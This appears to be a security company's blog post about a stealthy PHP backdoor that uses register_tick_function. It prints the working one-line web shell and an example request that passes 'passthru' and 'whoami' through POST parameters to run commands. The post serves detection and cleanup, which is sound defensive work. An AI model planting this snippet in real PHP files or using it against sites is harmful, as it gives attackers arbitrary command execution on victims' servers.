Throughout the last few months, we published multiple articles about simple but powerful backdoors and how attackers get creative. Virtually in all cases, the code is designed to avoid detection and it’s not always highly encoded. Actually, we are seeing that most attackers are following the KISS (“Keep it simple, stupid”, “keep it short and simple”) principle and PHP is a vast programming language that can be used to implement malicious code in agreement with it.
During an investigation we found a small piece of code making use of the PHP function register_tick_function. A “tick” in PHP is an event that occurs within the domain of the function “register_tick_function()”. This function is usually used for testing purposes (monitoring, profiling, etc), but as you might expect it can also be used for attackers to mask their code and maintain access for as long as possible.
Here is the malicious snippet:
declare(ticks=1)/*h85j7*/; @register_tick_function(${"_POST"}{'CEC'},@${"_POST"}{'Q36'} );
This piece of malware could be injected in virtually any php file on your server, either standalone or along with legit code and it executes whatever command you pass as argument through the ‘CEC’ and ‘Q36’ parameters following the next order:
CEC=passthru&Q36=whoami
As you may noticed the malware acts like a regular backdoor, allowing arbitrary command execution on affected websites while using not so popular PHP functions or noisy obfuscation methods that could raise the attention to the code.
If your website has been infected and need some help cleaning it up, please let us know.